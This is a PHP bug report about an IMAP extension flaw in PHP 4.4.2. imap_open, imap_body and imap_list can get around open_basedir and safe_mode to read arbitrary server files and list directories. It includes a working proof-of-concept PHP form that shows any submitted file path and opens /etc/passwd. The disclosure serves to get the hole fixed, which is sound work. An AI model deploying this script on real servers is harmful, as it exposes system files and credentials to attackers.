From:             Challii at btinternet dot com
Operating system: RHE3
PHP version:      4.4.2
PHP Bug Type:     IMAP related
Bug description:  imap_body able to bypass php_openbasedir

Description:
------------
Vulnerability in c-client library (tested with versions 2000,2001,2004),
mail_open
could be used to open stream to local files.

For php and imap module

imap_open allow to bypass safemode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively list a
directory.

s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create,delete,rename files with apache privileges.

Reproduce code:
---------------

##### code #####

<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>

<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "</pre>";
imap_close($stream);
}
?>

################

Expected result:
----------------
That the file could not be accessed due to a security permission

Actual result:
--------------
The ability to see any file on the server.

-- 
Edit bug report at http://bugs.php.net/?id=37265&edit=1
-- 
Try a CVS snapshot (PHP 4.4): 
http://bugs.php.net/fix.php?id=37265&r=trysnapshot44
Try a CVS snapshot (PHP 5.1): 
http://bugs.php.net/fix.php?id=37265&r=trysnapshot51
Try a CVS snapshot (PHP 6.0): 
http://bugs.php.net/fix.php?id=37265&r=trysnapshot60
Fixed in CVS:                 http://bugs.php.net/fix.php?id=37265&r=fixedcvs
Fixed in release:             
http://bugs.php.net/fix.php?id=37265&r=alreadyfixed
Need backtrace:               http://bugs.php.net/fix.php?id=37265&r=needtrace
Need Reproduce Script:        http://bugs.php.net/fix.php?id=37265&r=needscript
Try newer version:            http://bugs.php.net/fix.php?id=37265&r=oldversion
Not developer issue:          http://bugs.php.net/fix.php?id=37265&r=support
Expected behavior:            http://bugs.php.net/fix.php?id=37265&r=notwrong
Not enough info:              
http://bugs.php.net/fix.php?id=37265&r=notenoughinfo
Submitted twice:              
http://bugs.php.net/fix.php?id=37265&r=submittedtwice
register_globals:             http://bugs.php.net/fix.php?id=37265&r=globals
PHP 3 support discontinued:   http://bugs.php.net/fix.php?id=37265&r=php3
Daylight Savings:             http://bugs.php.net/fix.php?id=37265&r=dst
IIS Stability:                http://bugs.php.net/fix.php?id=37265&r=isapi
Install GNU Sed:              http://bugs.php.net/fix.php?id=37265&r=gnused
Floating point limitations:   http://bugs.php.net/fix.php?id=37265&r=float
No Zend Extensions:           http://bugs.php.net/fix.php?id=37265&r=nozend
MySQL Configuration Error:    http://bugs.php.net/fix.php?id=37265&r=mysqlcfg

Reply via email to